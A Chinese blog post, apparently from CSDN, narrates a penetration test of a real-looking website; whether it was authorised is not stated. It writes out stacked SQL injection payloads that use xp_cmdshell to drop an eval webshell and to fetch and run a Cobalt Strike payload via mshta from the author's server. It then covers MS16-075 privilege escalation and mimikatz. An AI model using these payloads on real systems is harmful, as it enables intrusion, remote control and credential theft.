某网站测试

最新推荐文章于 2024-07-19 14:05:43 发布
置顶 最新推荐文章于 2024-07-19 14:05:43 发布
阅读量805 收藏 4
点赞数 1
文章标签: intellij-idea maven java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45682070/article/details/106551790
版权

我得到的只有一个后台网址,首先也就是信息搜集了。在网络空间安全搜索引擎fofa上查询一下,再就是端口扫描 ,直接略过说有利用价值的端口:80,81,1433,3389
脆弱点:http://49.xxx.xx.xxx:81/Login/index
SQL注入post包(在响应包中得到ASP.NET+Microsoft-IIS/7.5)
权限:SA
在这里插入图片描述
刚开始得到注入就想着进入后台看看,然后肝了一段时间的py脚本,原谅我CAI
在这里插入图片描述
得到密码进入后台,模板千篇一律,无数据备份,无修改模板,上传个人判断基于白名单,有编辑器不过示例代码已删除,留言板不可留言,回过头来又看注入,既然是堆叠注入,那就可以执行SQL语句,然后一顿操作,嗯嗯嗯… 没有回显,代码如下:
在这里插入图片描述
以为到这里就结束了,没想到 3389端口登录失败,1433端口连接失败,这里我很懵,经过大佬的一番指导,堆叠注入是没有回显的,这时可ping以下dnslog,还好前几天补过:
在这里插入图片描述
既然dnslog有回显,那就证明xp_cmdshel扩展开启,可以执行命令,这里两种思路
第一种是cmd执行命令,输出到网站根目录
';exec master…xp_cmdshell ‘echo ^<%@ Page Language=“Jscript”%><%eval(Request.Item[“pass”],“unsafe”);%^> > c:\网站路径\shell.aspx’;–
由于我爆不出来绝对路径就采用了第二种方法

第二种是下载木马,运行木马直接上线
cs设置好监听器,生成一个html application文件,然后上传到cs服务器上
在注入点执行
'; exec master.dbo.xp_cmdshell ‘mshta http://39.xx.xxx.xxx:80/download/file.ext’; –
过一会儿有台主机上线了
在这里插入图片描述
设置好beacon回连时间,且不存在域
在这里插入图片描述
补丁安装200多,较多,把systeminfo中的信息漏洞对比,看有没有漏补的,发现可利用漏洞ms16-075
systeminfo | findstr KB3164038
https://github.com/vysecurity/reflectivepotato.git github上该exp的cna插件,加载到脚本管理器中
在这里插入图片描述
这里不应该直接创建管理员,应该mimikatz读取hash或者SSP获取明文密码,至此测试结束。

XiaoLeiZhaoO
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
SQL注入堆叠注入
qq_45557130的博客
10-08 229
sql注入堆叠注入
单位网站老是被劫持跳转到菠菜网站怎么办
weixin_34233679的博客
08-03 1258
2019独角兽企业重金招聘Python工程师标准>>> ...
博彩黑链应急响应学习
Websec
08-15 1125
应急整体流程如下: 第一步:确定黑链形成原因 第二步:了解网络拓扑图 第三步:确定漏洞面 第四步:日志记录分析 第五步恶意脚本分析与查杀 第六步:后门分析与查杀   ...
网站性能测试用例
03-23
网站性能测试用例软件测试网站提供会员模板下载、上传、购买、支付等功能,目前进入性能测试阶段,通过性能需求可以了解到主要有以下几个性能指标需要进行测试:●产品页面刷新性能●产品上传性能●产品下载性能...
非常好的某网站性能测试用例
04-27
对于某网站来说,其性能测试主要关注产品页面刷新、产品上传和产品下载这三个核心功能。目标是确保系统在高压力环境下能够稳定运行,并满足预设的性能标准。 【延迟性能】 1. 产品页面刷新:要求响应时间小于5秒,...
【互联网行业】网站测试-某公司网站压力测试手册.docx
12-02
这个文档,"【互联网行业】网站测试-某公司网站压力测试手册.docx",提供了一个详细的指南,用于指导RealmeShow公司的压力测试实践。以下是手册中涉及的关键知识点: 1. **压力测试报告**:这是整个测试过程的记录...
某公司测试报告1
08-08
这篇测试报告主要关注了某公司在软件测试过程中的各项性能指标,特别是针对Mycat(一个分布式数据库中间件)、MySQL在Docker环境和物理机环境下的表现,以及高可用性和破坏性测试测试涉及的关键技术点包括压力测试...
网站测试bug分享
01-08
当我们增加某个数据项时,需要检查该数据某字段内容是否过长,从而导致查询显示回事数据列表变形。同时,字符串长度和类型检查也非常重要。例如,在用户名或密码输入框中,我们需要检查输入的字符串长度是否超出限制...
网络空间搜索引擎Fofa的简单使用
weixin_44110913的博客
08-02 5687
目录 Fofa 逻辑运算符 查找使用指定应用的IP 查找使用指定协议的IP 查找开放指定端口的IP 查找IP或网段的信息 查找使用指定css或js的网站 使用Fofa API接口 其他 Fofa Fofa 是白帽汇推出的一款网络空间搜索引擎,它通过进行网络空间测绘,能够帮助研究人员或者企业迅速进行网络资产匹配。例如进行漏洞影响范围分析、应用分布统计、应用流行度等。在渗透测试过程中,Fofa能帮助测试人员快速发现目标资产...
SQL注入-基于布尔的盲注
Snowflake1997的博客
02-19 1354
访问SQLi-Labs网站 在攻击机Pentest-Atk打开FireFox浏览器,并访问靶机A-SQLi-Labs上的SQLi-Labs网站Less-8。访问的URL为: http://[靶机IP]/sqli-labs/Less-8/ 登录后,根据网页提示,给定一个?id=1的参数,即: http://[靶机IP]/sqli-labs/Less-8/?id=1 此时页面显示You are in...,显示状态未True。 如果给定一个?id=-1的参数,即: http:/.
【mac 安全渗透测试】之SQL注入Demo
LYX_WIN
12-22 3725
一、下载安装sqlmap 1、官网地址:sqlmap: automatic SQL injection and database takeover tool git下载: git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev 2、验证sqlmap安装成功: ./sqlmap.py -v 显示如下日志则说明成功: __H__ ___ ___[)]_____ ___ ___ {1
堆叠查询注入攻击
zjdda的博客
05-30 710
堆叠注入原理及介绍 Stacked injections:堆叠注入。从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在mysql中,主要是命令行中,每一条语句结尾加 ; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做stacked injection。 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下 一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injectio
《WEB安全渗透测试》(5)SQL注入实战:堆叠查询注入
午夜安全
10-03 6599
《WEB安全渗透测试》(5)SQL注入实战:堆叠查询注入 堆叠查询注入:堆叠查询可以执行多条SQL语句,语句之间以分号(;)隔开。而堆叠查询注入攻击就是利用此特点,在第二条语句中构造自己要执行的语句。1)考虑使用堆叠注入访问URL:http://www.tianchi.com/web/duidie.php?id=1返回正常信息;访问URL:http://www.tianchi.com/web/duidie.php?id=1'返回错误信息......
MYSQL 堆叠注入详解
AaronLuo
09-19 4429
堆叠注入与受限于select语句的联合查询法相反,堆叠注入可用于执行任意SQL语句。简单地说就是MYSQL的多语句查询 堆叠注入的局限性:堆叠注入并不是在哦任何换环境下都可以执行的,可能受到API或者数据库引擎不支持的限制(如Oracle数据库),也有可能权限不足。web系统中,因为代码通常只返回一个查询结果,因此堆叠注入第二个语句产生错误或者结果只能被忽略,我们在前端界面是无法看到返回结果的。因...
SQL注入之堆叠注入
Jim的博客
08-13 2925
less-50 源码:$sql="select * from users order by $id"; if (mysqli_multi_query($con1,$sql))  //mysqli_multi_query()可以执行多个sql语句,而mysqli_query()只能执行一个sql语句 注入:?sort=1;create table jack like users# less-
公司网站被跳转到其他网站被提示该站点可能受到黑客攻击,部分页面已被非法篡改
热门推荐
网站安全专家
08-03 1万+
最近一段时间,我们SINE安全公司一连接到数十个公司网站被跳转到其他网站上去,bc网站上去,客户反映从百度搜索网站进去,直接跳转到其他网站上,直接输入网址没有跳转,导致客户网站的流量急剧下滑,做的百度推广跟搜狗推广,都给灰色0网站做广告了,公司领导高度重视网站安全的问题,因为给公司的形象以及名誉带来的损失太大了,我们安排安全技术人员对其网站进行全面的网站安全检测,对网站存在的漏洞,以及木马后门进行全面的清除与漏洞修复,安全加固。关于网站被跳转到灰色网站的问题,整理一份详细的处理过程
记录贴-idea导入别人的项目
最新发布
yuan5025的博客
07-19 260
链接: 链接: 链接:
使用JMeter对某个网站进行性能测试
06-06
然后,你可以添加HTTP请求,输入要测试网站的URL,设置HTTP请求方法(GET或POST),并设置其他参数,例如请求头、请求正文等。 你还可以添加断言来验证响应,以确保网站的正常运行。可以使用JMeter提供的多种不同...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值